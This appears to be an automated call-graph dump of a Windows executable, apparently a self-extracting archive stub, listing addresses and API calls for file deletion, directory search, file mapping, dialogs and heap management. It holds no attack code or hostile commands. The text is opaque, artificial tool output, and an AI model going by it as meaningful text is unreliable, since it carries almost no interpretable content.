__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23908 fb4086 23906->23908 23907 fd4167 23924 fd49e6 51 API calls 4 library calls 23907->23924 23908->23653 23911 fd40cf 23911->23906 23912 fd4172 23925 fd46b9 20 API calls _free 23912->23925 23913->23902 23914->23911 23916 fd4653 23915->23916 23922 fd40ef 23915->23922 23916->23922 23926 fd97e5 GetLastError 23916->23926 23918 fd4674 23946 fd993a 38 API calls __fassign 23918->23946 23920 fd468d 23947 fd9967 38 API calls __fassign 23920->23947 23923 fd4601 20 API calls 2 library calls 23922->23923 23923->23907 23924->23912 23925->23911 23927 fd97fb 23926->23927 23928 fd9801 23926->23928 23948 fdae5b 11 API calls 2 library calls 23927->23948 23932 fd9850 SetLastError 23928->23932 23949 fdb136 23928->23949 23932->23918 23935 fd9830 23937 fd981b 23935->23937 23938 fd9837 23935->23938 23936 fd9821 23940 fd985c SetLastError 23936->23940 23956 fd8dcc 23937->23956 23963 fd9649 20 API calls __dosmaperr 23938->23963 23964 fd8d24 38 API calls _abort 23940->23964 23941 fd9842 23943 fd8dcc _free 20 API calls 23941->23943 23945 fd9849 23943->23945 23945->23932 23945->23940 23946->23920 23947->23922 23948->23928 23954 fdb143 __dosmaperr 23949->23954 23950 fdb16e RtlAllocateHeap 23952 fd9813 23950->23952 23950->23954 23951 fdb183 23966 fd91a8 20 API calls __dosmaperr 23951->23966 23952->23937 23962 fdaeb1 11 API calls 2 library calls 23952->23962 23954->23950 23954->23951 23965 fd7a5e 7 API calls 2 library calls 23954->23965 23957 fd8dd7 RtlFreeHeap 23956->23957 23961 fd8e00 _free 23956->23961 23958 fd8dec 23957->23958 23957->23961 23967 fd91a8 20 API calls __dosmaperr 23958->23967 23960 fd8df2 GetLastError 23960->23961 23961->23936 23962->23935 23963->23941 23965->23954 23966->23952 23967->23960 23969 fb9781 23968->23969 23972 fb9757 23968->23972 23969->23743 23972->23969 23979 fba1e0 23972->23979 23975 fb964a 23973->23975 23976 fb962c 23973->23976 23974 fb9669 23974->23743 23975->23974 23987 fb6bd5 76 API calls 23975->23987 23976->23975 23977 fb9638 FindCloseChangeNotification 23976->23977 23977->23975 23980 fcec50 23979->23980 23981 fba1ed DeleteFileW 23980->23981 23982 fb977f 23981->23982 23983 fba200 23981->23983 23982->23743 23984 fbbb03 GetCurrentDirectoryW 23983->23984 23985 fba214 23984->23985 23985->23982 23986 fba218 DeleteFileW 23985->23986 23986->23982 23987->23974 23994 fbd9b0 23988->23994 23991 fbe66b LoadStringW 23992 fbe645 SetDlgItemTextW 23991->23992 23993 fbe682 LoadStringW 23991->23993 23992->23750 23993->23992 23999 fbd8ec 23994->23999 23996 fbd9cd 23997 fbd9e2 23996->23997 24007 fbd9f0 26 API calls 23996->24007 23997->23991 23997->23992 24000 fbd904 23999->24000 24005 fbd984 _strncpy 23999->24005 24002 fbd928 24000->24002 24008 fc1da7 WideCharToMultiByte 24000->24008 24006 fbd959 24002->24006 24009 fbe5b1 50 API calls __vsnprintf 24002->24009 24005->23996 24010 fd6159 26 API calls 3 library calls 24006->24010 24007->23997 24008->24002 24009->24006 24010->24005 24012 fcb31e 24011->24012 24013 fcb3f0 ExpandEnvironmentStringsW 24012->24013 24014 fcb40d 24012->24014 24013->24014 24014->23762 24015->23762 24016->23762 24017->23775 24018->23762 24019->23762 24020->23762 24022 fd8e54 24021->24022 24023 fd8e6c 24022->24023 24024 fd8e61 24022->24024 24026 fd8e74 24023->24026 24033 fd8e7d __dosmaperr 24023->24033 24034 fd8e06 24024->24034 24027 fd8dcc _free 20 API calls 24026->24027 24030 fd8e69 24027->24030 24028 fd8ea7 HeapReAlloc 24028->24030 24028->24033 24029 fd8e82 24041 fd91a8 20 API calls __dosmaperr 24029->24041 24030->23762 24033->24028 24033->24029 24042 fd7a5e 7 API calls 2 library calls 24033->24042 24035 fd8e44 24034->24035 24039 fd8e14 __dosmaperr 24034->24039 24044 fd91a8 20 API calls __dosmaperr 24035->24044 24036 fd8e2f RtlAllocateHeap 24038 fd8e42 24036->24038 24036->24039 24038->24030 24039->24035 24039->24036 24043 fd7a5e 7 API calls 2 library calls 24039->24043 24041->24030 24042->24033 24043->24039 24044->24038 24046 fc0666 _wcslen 24045->24046 24073 fb17e9 24046->24073 24048 fc067e 24048->23779 24050 fc0659 _wcslen 24049->24050 24051 fb17e9 78 API calls 24050->24051 24052 fc067e 24051->24052 24052->23781 24054 fb7b17 __EH_prolog 24053->24054 24090 fbce40 24054->24090 24056 fb7b32 24096 fceb38 24056->24096 24058 fb7b5c 24105 fc4a76 24058->24105 24061 fb7c7d 24062 fb7c87 24061->24062 24064 fb7cf1 24062->24064 24137 fba56d 24062->24137 24066 fb7d50 24064->24066 24115 fb8284 24064->24115 24065 fb7d92 24065->23785 24066->24065 24143 fb138b 74 API calls 24066->24143 24070 fb7bac 24069->24070 24072 fb7bb3 24069->24072 24071 fc2297 86 API calls 24070->24071 24071->24072 24074 fb17ff 24073->24074 24085 fb185a __InternalCxxFrameHandler 24073->24085 24075 fb1828 24074->24075 24086 fb6c36 76 API calls __vswprintf_c_l 24074->24086 24077 fb1887 24075->24077 24082 fb1847 ___std_exception_copy 24075->24082 24079 fd3e3e 22 API calls 24077->24079 24078 fb181e 24087 fb6ca7 75 API calls 24078->24087 24081 fb188e 24079->24081 24081->24085 24089 fb6ca7 75 API calls 24081->24089 24082->24085 24088 fb6ca7 75 API calls 24082->24088 24085->24048 24086->24078 24087->24075 24088->24085 24089->24085 24091 fbce4a __EH_prolog 24090->24091 24092 fceb38 8 API calls 24091->24092 24093 fbce8d 24092->24093 24094 fceb38 8 API calls 24093->24094 24095 fbceb1 24094->24095 24095->24056 24097 fceb3d ___std_exception_copy 24096->24097 24098 fceb57 24097->24098 24101 fceb59 24097->24101 24111 fd7a5e 7 API calls 2 library calls 24097->24111 24098->24058 24100 fcf5c9 24113 fd238d RaiseException 24100->24113 24101->24100 24112 fd238d RaiseException 24101->24112 24103 fcf5e6 24106 fc4a80 __EH_prolog 24105->24106 24107 fceb38 8 API calls 24106->24107 24108 fc4a9c 24107->24108 24109 fb7b8b 24108->24109 24114 fc0e46 80 API calls 24108->24114 24109->24061 24111->24097 24112->24100 24113->24103 24114->24109 24116 fb828e __EH_prolog 24115->24116 24144 fb13dc 24116->24144 24118 fb82aa 24119 fb82bb 24118->24119 24287 fb9f42 24118->24287 24122 fb82f2 24119->24122 24152 fb1a04 24119->24152 24283 fb1692 24122->24283 24128 fb83e8 24179 fb1f6d 24128->24179 24131 fb83f3 24131->24122 24183 fb3b2d 24131->24183 24195 fb848e 24131->24195 24133 fba56d 7 API calls 24134 fb82ee 24133->24134 24134->24122 24134->24133 24136 fb8389 24134->24136 24291 fbc0c5 CompareStringW _wcslen 24134->24291 24171 fb8430 24136->24171 24138 fba582 24137->24138 24142 fba5b0 24138->24142 24551 fba69b 24138->24551 24140 fba592 24141 fba597 FindClose 24140->24141 24140->24142 24141->24142 24142->24062 24143->24065 24145 fb13e1 __EH_prolog 24144->24145 24146 fbce40 8 API calls 24145->24146 24147 fb1419 24146->24147 24148 fceb38 8 API calls 24147->24148 24151 fb1474 __cftof 24147->24151 24149 fb1461 24148->24149 24149->24151 24292 fbb505 24149->24292 24151->24118 24153 fb1a0e __EH_prolog 24152->24153 24165 fb1a61 24153->24165 24168 fb1b9b 24153->24168 24308 fb13ba 24153->24308 24156 fb1bc7 24311 fb138b 74 API calls 24156->24311 24158 fb3b2d 101 API calls 24162 fb1c12 24158->24162 24159 fb1bd4 24159->24158 24159->24168 24160 fb1c5a 24164 fb1c8d 24160->24164 24160->24168 24312 fb138b 74 API calls 24160->24312 24162->24160 24163 fb3b2d 101 API calls 24162->24163 24163->24162 24164->24168 24169 fb9e80 79 API calls 24164->24169 24165->24156 24165->24159 24165->24168 24166 fb3b2d 101 API calls 24167 fb1cde 24166->24167 24167->24166 24167->24168 24168->24134 24169->24167 24170 fb9e80 79 API calls 24170->24165 24330 fbcf3d 24171->24330 24173 fb8440 24334 fc13d2 GetSystemTime SystemTimeToFileTime 24173->24334 24175 fb83a3 24175->24128 24176 fc1b66 24175->24176 24335 fcde6b 24176->24335 24180 fb1f72 __EH_prolog 24179->24180 24182 fb1fa6 24180->24182 24343 fb19af 24180->24343 24182->24131 24184 fb3b39 24183->24184 24185 fb3b3d 24183->24185 24184->24131 24194 fb9e80 79 API calls 24185->24194 24186 fb3b4f 24187 fb3b6a 24186->24187 24188 fb3b78 24186->24188 24189 fb3baa 24187->24189 24473 fb32f7 89 API calls 2 library calls 24187->24473 24474 fb286b 101 API calls 3 library calls 24188->24474 24189->24131 24192 fb3b76 24192->24189 24475 fb20d7 74 API calls 24192->24475 24194->24186 24196 fb8498 __EH_prolog 24195->24196 24199 fb84d5 24196->24199 24210 fb8513 24196->24210 24500 fc8c8d 103 API calls 24196->24500 24198 fb84f5 24200 fb84fa 24198->24200 24201 fb851c 24198->24201 24199->24198 24204 fb857a 24199->24204 24199->24210 24200->24210 24501 fb7a0d 152 API calls 24200->24501 24201->24210 24502 fc8c8d 103 API calls 24201->24502 24204->24210 24476 fb5d1a 24204->24476 24206 fb8605 24206->24210 24482 fb8167 24206->24482 24209 fb8797 24211 fba56d 7 API calls 24209->24211 24214 fb8802 24209->24214 24210->24131 24211->24214 24213 fbd051 82 API calls 24220 fb885d 24213->24220 24488 fb7c0d 24214->24488 24215 fb8a5f 24221 fb8ab6 24215->24221 24233 fb8a6a 24215->24233 24216 fb8992 24216->24215 24223 fb89e1 24216->24223 24217 fb898b 24505 fb2021 74 API calls 24217->24505 24220->24210 24220->24213 24220->24216 24220->24217 24503 fb8117 84 API calls 24220->24503 24504 fb2021 74 API calls 24220->24504 24224 fb8a4c 24221->24224 24508 fb7fc0 97 API calls 24221->24508 24222 fb8ab4 24225 fb959a 80 API calls 24222->24225 24223->24224 24226 fba231 3 API calls 24223->24226 24230 fb8b14 24223->24230 24224->24222 24224->24230 24225->24210 24229 fb8a19 24226->24229 24228 fb959a 80 API calls 24228->24210 24229->24224 24506 fb92a3 97 API calls 24229->24506 24242 fb8b82 24230->24242 24271 fb9105 24230->24271 24509 fb98bc 24230->24509 24231 fbab1a 8 API calls 24234 fb8bd1 24231->24234 24233->24222 24507 fb7db2 101 API calls 24233->24507 24237 fbab1a 8 API calls 24234->24237 24254 fb8be7 24237->24254 24240 fb8b70 24513 fb6e98 77 API calls 24240->24513 24242->24231 24243 fb8d18 24246 fb8d8a 24243->24246 24249 fb8d28 24243->24249 24244 fb8e40 24247 fb8e52 24244->24247 24248 fb8e66 24244->24248 24268 fb8d49 24244->24268 24245 fb8cbc 24245->24243 24245->24244 24256 fb8167 19 API calls 24246->24256 24250 fb9215 123 API calls 24247->24250 24251 fc3377 75 API calls 24248->24251 24252 fb8d6e 24249->24252 24260 fb8d37 24249->24260 24250->24268 24253 fb8e7f 24251->24253 24252->24268 24516 fb77b8 111 API calls 24252->24516 24519 fc3020 123 API calls 24253->24519 24254->24245 24255 fb8c93 24254->24255 24262 fb981a 79 API calls 24254->24262 24255->24245 24514 fb9a3c 82 API calls 24255->24514 24259 fb8dbd 24256->24259 24264 fb8de6 24259->24264 24265 fb8df5 24259->24265 24259->24268 24515 fb2021 74 API calls 24260->24515 24262->24255 24517 fb7542 85 API calls 24264->24517 24518 fb9155 93 API calls __EH_prolog 24265->24518 24270 fb8f85 24268->24270 24520 fb2021 74 API calls 24268->24520 24270->24271 24272 fb903e 24270->24272 24280 fb9090 24270->24280 24494 fb9f09 SetEndOfFile 24270->24494 24271->24228 24495 fb9da2 24272->24495 24273 fba4ed 3 API calls 24274 fb90eb 24273->24274 24274->24271 24521 fb2021 74 API calls 24274->24521 24277 fb9085 24279 fb9620 77 API calls 24277->24279 24279->24280 24280->24271 24280->24273 24281 fb90fb 24522 fb6dcb 76 API calls 24281->24522 24284 fb16a4 24283->24284 24538 fbcee1 24284->24538 24288 fb9f59 24287->24288 24289 fb9f63 24288->24289 24550 fb6d0c 78 API calls 24288->24550 24289->24119 24291->24134 24293 fbb50f __EH_prolog 24292->24293 24298 fbf1d0 82 API calls 24293->24298 24295 fbb521 24299 fbb61e 24295->24299 24298->24295 24300 fbb630 __cftof 24299->24300 24303 fc10dc 24300->24303 24306 fc109e GetCurrentProcess GetProcessAffinityMask 24303->24306 24307 fbb597 24306->24307 24307->24151 24313 fb1732 24308->24313 24310 fb13d6 24310->24170 24311->24168 24312->24164 24314 fb1748 24313->24314 24325 fb17a0 __InternalCxxFrameHandler 24313->24325 24315 fb1771 24314->24315 24326 fb6c36 76 API calls __vswprintf_c_l 24314->24326 24317 fb17c7 24315->24317 24322 fb178d ___std_exception_copy 24315->24322 24319 fd3e3e 22 API calls 24317->24319 24318 fb1767 24327 fb6ca7 75 API calls 24318->24327 24321 fb17ce 24319->24321 24321->24325 24329 fb6ca7 75 API calls 24321->24329 24322->24325 24328 fb6ca7 75 API calls 24322->24328 24325->24310 24326->24318 24327->24315 24328->24325 24329->24325 24331 fbcf4d 24330->24331 24333 fbcf54 24330->24333 24332 fb981a 79 API calls 24331->24332 24332->24333 24333->24173 24334->24175 24336 fcde78 24335->24336 24337 fbe617 53 API calls 24336->24337 24338 fcde9b 24337->24338 24339 fb4092 _swprintf 51 API calls 24338->24339 24340 fcdead 24339->24340 24341 fcd4d4 16 API calls 24340->24341 24342 fc1b7c 24341->24342 24342->24128 24344 fb19bf 24343->24344 24346 fb19bb 24343->24346 24347 fb18f6 24344->24347 24346->24182 24348 fb1908 24347->24348 24349 fb1945 24347->24349 24350 fb3b2d 101 API calls 24348->24350 24355 fb3fa3 24349->24355 24353 fb1928 24350->24353 24353->24346 24357 fb3fac 24355->24357 24356 fb3b2d 101 API calls 24356->24357 24357->24356 24359 fb1966 24357->24359 24372 fc0e08 24357->24372 24359->24353 24360 fb1e50 24359->24360 24361 fb1e5a __EH_prolog 24360->24361 24380 fb3bba 24361->24380 24363 fb1e84 24364 fb1732 78 API calls 24363->24364 24366 fb1f0b 24363->24366 24365 fb1e9b 24364->24365 24408 fb18a9 78 API calls 24365->24408 24366->24353 24368 fb1eb3 24370 fb1ebf _wcslen 24368->24370 24409 fc1b84 MultiByteToWideChar 24368->24409 24410 fb18a9 78 API calls 24370->24410 24373 fc0e0f 24372->24373 24376 fc0e2a 24373->24376 24378 fb6c31 RaiseException CallUnexpected 24373->24378 24375 fc0e3b SetThreadExecutionState 24375->24357 24376->24375 24379 fb6c31 RaiseException CallUnexpected 24376->24379 24378->24376 24379->24375 24381 fb3bc4 __EH_prolog 24380->24381 24382 fb3bda 24381->24382 24383 fb3bf6 24381->24383 24436 fb138b 74 API calls 24382->24436 24385 fb3e51 24383->24385 24388 fb3c22 24383->24388 24453 fb138b 74 API calls 24385->24453 24387 fb3be5 24387->24363 24388->24387 24411 fc3377 24388->24411 24390 fb3ca3 24391 fb3d2e 24390->24391 24407 fb3c9a 24390->24407 24439 fbd051 24390->24439 24421 fbab1a 24391->24421 24392 fb3c9f 24392->24390 24438 fb20bd 78 API calls 24392->24438 24394 fb3c8f 24437 fb138b 74 API calls 24394->24437 24395 fb3c71 24395->24390 24395->24392 24395->24394 24397 fb3d41 24401 fb3dd7 24397->24401 24402 fb3dc7 24397->24402 24445 fc3020 123 API calls 24401->24445 24425 fb9215 24402->24425 24405 fb3dd5 24405->24407 24446 fb2021 74 API calls 24405->24446 24447 fc2297 24407->24447 24408->24368 24409->24370 24410->24366 24412 fc338c 24411->24412 24413 fc3396 ___std_exception_copy 24411->24413 24454 fb6ca7 75 API calls 24412->24454 24415 fc341c 24413->24415 24416 fc34c6 24413->24416 24420 fc3440 __cftof 24413->24420 24455 fc32aa 75 API calls 3 library calls 24415->24455 24456 fd238d RaiseException 24416->24456 24419 fc34f2 24420->24395 24422 fbab28 24421->24422 24424 fbab32 24421->24424 24423 fceb38 8 API calls 24422->24423 24423->24424 24424->24397 24426 fb921f __EH_prolog 24425->24426 24457 fb7c64 24426->24457 24429 fb13ba 78 API calls 24430 fb9231 24429->24430 24460 fbd114 24430->24460 24433 fbd114 118 API calls 24434 fb9243 24433->24434 24434->24433 24435 fb928a 24434->24435 24469 fbd300 97 API calls __InternalCxxFrameHandler 24434->24469 24435->24405 24436->24387 24437->24407 24438->24390 24440 fbd072 24439->24440 24441 fbd084 24439->24441 24470 fb603a 82 API calls 24440->24470 24471 fb603a 82 API calls 24441->24471 24444 fbd07c 24444->24391 24445->24405 24446->24407 24449 fc22a1 24447->24449 24448 fc22ba 24472 fc0eed 86 API calls 24448->24472 24449->24448 24452 fc22ce 24449->24452 24451 fc22c1 24451->24452 24453->24387 24454->24413 24455->24420 24456->24419 24458 fbb146 GetVersionExW 24457->24458 24459 fb7c69 24458->24459 24459->24429 24466 fbd12a __InternalCxxFrameHandler 24460->24466 24461 fbd29a 24462 fbd2ce 24461->24462 24463 fbd0cb 6 API calls 24461->24463 24464 fc0e08 SetThreadExecutionState RaiseException 24462->24464 24463->24462 24467 fbd291 24464->24467 24465 fc8c8d 103 API calls 24465->24466 24466->24461 24466->24465 24466->24467 24468 fbac05 91 API calls 24466->24468 24467->24434 24468->24466 24469->24434 24470->24444 24471->24444 24472->24451 24473->24192 24474->24192 24475->24189 24477 fb5d2a 24476->24477 24523 fb5c4b 24477->24523 24479 fb5d5d 24481 fb5d95 24479->24481 24528 fbb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24479->24528 24481->24206 24483 fb8186 24482->24483 24484 fb8232 24483->24484 24535 fbbe5e 19 API calls __InternalCxxFrameHandler 24483->24535 24534 fc1fac CharUpperW 24484->24534 24487 fb823b 24487->24209 24489 fb7c22 24488->24489 24490 fb7c5a 24489->24490 24536 fb6e7a 74 API calls 24489->24536 24490->24220 24492 fb7c52 24537 fb138b 74 API calls 24492->24537 24494->24272 24496 fb9db3 24495->24496 24499 fb9dc2 24495->24499 24497 fb9db9 FlushFileBuffers 24496->24497 24496->24499 24497->24499 24498 fb9e3f SetFileTime 24498->24277 24499->24498 24500->24199 24501->24210 24502->24210 24503->24220 24504->24220 24505->24216 24506->24224 24507->24222 24508->24224 24510 fb8b5a 24509->24510 24511 fb98c5 GetFileType 24509->24511 24510->24242 24512 fb2021 74 API calls 24510->24512 24511->24510 24512->24240 24513->24242 24514->24245 24515->24268 24516->24268 24517->24268 24518->24268 24519->24268 24520->24270 24521->24281 24522->24271 24529 fb5b48 24523->24529 24525 fb5c6c 24525->24479 24527 fb5b48 2 API calls 24527->24525 24528->24479 24530 fb5b52 24529->24530 24532 fb5c3a 24530->24532 24533 fbb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24530->24533 24532->24525 24532->24527 24533->24530 24534->24487 24535->24484 24536->24492 24537->24490 24539 fbcef2 24538->24539 24544 fba99e 24539->24544 24541 fbcf24 24542 fba99e 86 API calls 24541->24542 24543 fbcf2f 24542->24543 24545 fba9c1 24544->24545 24548 fba9d5 24544->24548 24549 fc0eed 86 API calls 24545->24549 24547 fba9c8 24547->24548 24548->24541 24549->24547 24550->24289 24552 fba6a8 24551->24552 24553 fba6c1 FindFirstFileW 24552->24553 24554 fba727 FindNextFileW 24552->24554 24555 fba6d0 24553->24555 24561 fba709 24553->24561 24556 fba732 GetLastError 24554->24556 24554->24561 24557 fbbb03 GetCurrentDirectoryW 24555->24557 24556->24561 24558 fba6e0 24557->24558 24559 fba6fe GetLastError 24558->24559 24560 fba6e4 FindFirstFileW 24558->24560 24559->24561 24560->24559 24560->24561 24561->24140 24571 fca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24562->24571 24564 fca5cd 24565 fca5d9 24564->24565 24572 fca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24564->24572 24565->23792 24565->23793 24567->23799 24568->23802 24569->23802 24570->23805 24571->24564 24572->24565 24573->23813 24575 fb9f42 78 API calls 24574->24575 24576 fb1fe8 24575->24576 24577 fb1a04 101 API calls 24576->24577 24580 fb2005 24576->24580 24578 fb1ff5 24577->24578 24578->24580 24581 fb138b 74 API calls 24578->24581 24580->23821 24580->23822 24581->24580 24583 fcb5bc GetDlgItem 24582->24583 24584 fcb583 GetMessageW 24582->24584 24583->23832 24583->23833 24585 fcb5a8 TranslateMessage DispatchMessageW 24584->24585 24586 fcb599 IsDialogMessageW 24584->24586 24585->24583 24586->24583 24586->24585 25332 fc94e0 GetClientRect 25368 fc21e0 26 API calls std::bad_exception::bad_exception 25390 fcf2e0 46 API calls __RTC_Initialize 25391 fdbee0 GetCommandLineA GetCommandLineW 25392 fd0ada 51 API calls 2 library calls 24651 fce2d7 24652 fce1db 24651->24652 24653 fce85d ___delayLoadHelper2@8 14 API calls 24652->24653 24653->24652 24656 fce1d1 14 API calls ___delayLoadHelper2@8 25406 fda3d0 21 API calls 2 library calls 24657 fb10d5 24662 fb5abd 24657->24662 24663 fb5ac7 __EH_prolog 24662->24663 24664 fbb505 84 API calls 24663->24664 24665 fb5ad3 24664->24665 24669 fb5cac GetCurrentProcess GetProcessAffinityMask 24665->24669 25407 fe2bd0 VariantClear 25333 fcf4d3 20 API calls 25395 fc62ca 123 API calls __InternalCxxFrameHandler 25370 fcb5c0 100 API calls 25409 fc77c0 118 API calls 25410 fcffc0 RaiseException _com_error::_com_error CallUnexpected 24678 fcdec2 24679 fcdecf 24678->24679 24680 fbe617 53 API calls 24679->24680 24681 fcdedc 24680->24681 24682 fb4092 _swprintf 51 API calls 24681->24682 24683 fcdef1 SetDlgItemTextW 24682->24683 24684 fcb568 5 API calls 24683->24684 24685 fcdf0e 24684->24685 25411 fc1bbd GetCPInfo IsDBCSLeadByte 24690 fce5b1 24691 fce578 24690->24691 24691->24690 24692 fce85d ___delayLoadHelper2@8 14 API calls 24691->24692 24692->24691 24820 fcf3b2 24821 fcf3be ___scrt_is_nonwritable_in_current_image 24820->24821 24852 fceed7 24821->24852 24823 fcf3c5 24824 fcf518 24823->24824 24827 fcf3ef 24823->24827 24925 fcf838 4 API calls 2 library calls 24824->24925 24826 fcf51f 24918 fd7f58 24826->24918 24829 fcf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24827->24829 24863 fd8aed 24827->24863 24837 fcf48f 24829->24837 24921 fd7af4 38 API calls 3 library calls 24829->24921 24835 fcf40e 24871 fcf953 GetStartupInfoW __cftof 24837->24871 24839 fcf495 24872 fd8a3e 51 API calls 24839->24872 24842 fcf49d 24873 fcdf1e 24842->24873 24846 fcf4b1 24846->24826 24847 fcf4b5 24846->24847 24848 fcf4be 24847->24848 24923 fd7efb 28 API calls _abort 24847->24923 24924 fcf048 12 API calls ___scrt_uninitialize_crt 24848->24924 24851 fcf4c6 24851->24835 24853 fceee0 24852->24853 24927 fcf654 IsProcessorFeaturePresent 24853->24927 24855 fceeec 24928 fd2a5e 24855->24928 24857 fceef1 24862 fceef5 24857->24862 24936 fd8977 24857->24936 24860 fcef0c 24860->24823 24862->24823 24864 fd8b04 24863->24864 24865 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24864->24865 24866 fcf408 24865->24866 24866->24835 24867 fd8a91 24866->24867 24868 fd8ac0 24867->24868 24869 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24868->24869 24870 fd8ae9 24869->24870 24870->24829 24871->24839 24872->24842 25029 fc0863 24873->25029 24877 fcdf3d 25078 fcac16 24877->25078 24879 fcdf46 __cftof 24880 fcdf59 GetCommandLineW 24879->24880 24881 fcdf68 24880->24881 24882 fcdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24880->24882 25082 fcc5c4 24881->25082 24884 fb4092 _swprintf 51 API calls 24882->24884 24886 fce04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24884->24886 25093 fcb6dd LoadBitmapW 24886->25093 24888 fcdf76 OpenFileMappingW 24891 fcdf8f MapViewOfFile 24888->24891 24892 fcdfd6 CloseHandle 24888->24892 24889 fcdfe0 25087 fcdbde 24889->25087 24895 fcdfcd UnmapViewOfFile 24891->24895 24896 fcdfa0 __InternalCxxFrameHandler 24891->24896 24892->24882 24895->24892 24900 fcdbde 2 API calls 24896->24900 24902 fcdfbc 24900->24902 24901 fc90b7 8 API calls 24903 fce0aa DialogBoxParamW 24901->24903 24902->24895 24904 fce0e4 24903->24904 24905 fce0fd 24904->24905 24906 fce0f6 Sleep 24904->24906 24908 fce10b 24905->24908 25123 fcae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24905->25123 24906->24905 24909 fce12a DeleteObject 24908->24909 24910 fce13f DeleteObject 24909->24910 24911 fce146 24909->24911 24910->24911 24912 fce177 24911->24912 24914 fce189 24911->24914 25124 fcdc3b 6 API calls 24912->25124 25120 fcac7c 24914->25120 24916 fce17d CloseHandle 24916->24914 24917 fce1c3 24922 fcf993 GetModuleHandleW 24917->24922 25254 fd7cd5 24918->25254 24921->24837 24922->24846 24923->24848 24924->24851 24925->24826 24927->24855 24940 fd3b07 24928->24940 24931 fd2a67 24931->24857 24933 fd2a6f 24934 fd2a7a 24933->24934 24954 fd3b43 DeleteCriticalSection 24933->24954 24934->24857 24983 fdc05a 24936->24983 24939 fd2a7d 7 API calls 2 library calls 24939->24862 24941 fd3b10 24940->24941 24943 fd3b39 24941->24943 24944 fd2a63 24941->24944 24955 fd3d46 24941->24955 24960 fd3b43 DeleteCriticalSection 24943->24960 24944->24931 24946 fd2b8c 24944->24946 24976 fd3c57 24946->24976 24949 fd2ba1 24949->24933 24951 fd2baf 24952 fd2bbc 24951->24952 24982 fd2bbf 6 API calls ___vcrt_FlsFree 24951->24982 24952->24933 24954->24931 24961 fd3c0d 24955->24961 24958 fd3d7e InitializeCriticalSectionAndSpinCount 24959 fd3d69 24958->24959 24959->24941 24960->24944 24962 fd3c26 24961->24962 24963 fd3c4f 24961->24963 24962->24963 24968 fd3b72 24962->24968 24963->24958 24963->24959 24966 fd3c3b GetProcAddress 24966->24963 24967 fd3c49 24966->24967 24967->24963 24973 fd3b7e ___vcrt_FlsFree 24968->24973 24969 fd3bf3 24969->24963 24969->24966 24970 fd3b95 LoadLibraryExW 24971 fd3bfa 24970->24971 24972 fd3bb3 GetLastError 24970->24972 24971->24969 24974 fd3c02 FreeLibrary 24971->24974 24972->24973 24973->24969 24973->24970 24975 fd3bd5 LoadLibraryExW 24973->24975 24974->24969 24975->24971 24975->24973 24977 fd3c0d ___vcrt_FlsFree 5 API calls 24976->24977 24978 fd3c71 24977->24978 24979 fd3c8a TlsAlloc 24978->24979 24980 fd2b96 24978->24980 24980->24949 24981 fd3d08 6 API calls ___vcrt_FlsFree 24980->24981 24981->24951 24982->24949 24986 fdc077 24983->24986 24987 fdc073 24983->24987 24984 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24985 fceefe 24984->24985 24985->24860 24985->24939 24986->24987 24989 fda6a0 24986->24989 24987->24984 24990 fda6ac ___scrt_is_nonwritable_in_current_image 24989->24990 25001 fdac31 EnterCriticalSection 24990->25001 24992 fda6b3 25002 fdc528 24992->25002 24994 fda6c2 25000 fda6d1 24994->25000 25015 fda529 29 API calls 24994->25015 24997 fda6cc 25016 fda5df GetStdHandle GetFileType 24997->25016 24999 fda6e2 _abort 24999->24986 25017 fda6ed LeaveCriticalSection _abort 25000->25017 25001->24992 25003 fdc534 ___scrt_is_nonwritable_in_current_image 25002->25003 25004 fdc558 25003->25004 25005 fdc541 25003->25005 25018 fdac31 EnterCriticalSection 25004->25018 25026 fd91a8 20 API calls __dosmaperr 25005->25026 25008 fdc546 25027 fd9087 26 API calls __cftof 25008->25027 25010 fdc590 25028 fdc5b7 LeaveCriticalSection _abort 25010->25028 25011 fdc550 _abort 25011->24994 25012 fdc564 25012->25010 25019 fdc479 25012->25019 25015->24997 25016->25000 25017->24999 25018->25012 25020 fdb136 __dosmaperr 20 API calls 25019->25020 25021 fdc48b 25020->25021 25024 fdaf0a 11 API calls 25021->25024 25025 fdc498 25021->25025 25022 fd8dcc _free 20 API calls 25023 fdc4ea 25022->25023 25023->25012 25024->25021 25025->25022 25026->25008 25027->25011 25028->25011 25030 fcec50 25029->25030 25031 fc086d GetModuleHandleW 25030->25031 25032 fc0888 GetProcAddress 25031->25032 25033 fc08e7 25031->25033 25034 fc08b9 GetProcAddress 25032->25034 25035 fc08a1 25032->25035 25036 fc0c14 GetModuleFileNameW 25033->25036 25134 fd75fb 42 API calls 2 library calls 25033->25134 25037 fc08cb 25034->25037 25035->25034 25045 fc0c32 25036->25045 25037->25033 25039 fc0b54 25039->25036 25040 fc0b5f GetModuleFileNameW CreateFileW 25039->25040 25041 fc0b8f SetFilePointer 25040->25041 25042 fc0c08 CloseHandle 25040->25042 25041->25042 25043 fc0b9d ReadFile 25041->25043 25042->25036 25043->25042 25047 fc0bbb 25043->25047 25048 fc0c94 GetFileAttributesW 25045->25048 25050 fc0c5d CompareStringW 25045->25050 25051 fc0cac 25045->25051 25125 fbb146 25045->25125 25128 fc081b 25045->25128 25047->25042 25049 fc081b 2 API calls 25047->25049 25048->25045 25048->25051 25049->25047 25050->25045 25052 fc0cb7 25051->25052 25055 fc0cec 25051->25055 25054 fc0cd0 GetFileAttributesW 25052->25054 25056 fc0ce8 25052->25056 25053 fc0dfb 25077 fca64d GetCurrentDirectoryW 25053->25077 25054->25052 25054->25056 25055->25053 25057 fbb146 GetVersionExW 25055->25057 25056->25055 25058 fc0d06 25057->25058 25059 fc0d0d 25058->25059 25060 fc0d73 25058->25060 25062 fc081b 2 API calls 25059->25062 25061 fb4092 _swprintf 51 API calls 25060->25061 25063 fc0d9b AllocConsole 25061->25063 25064 fc0d17 25062->25064 25065 fc0da8 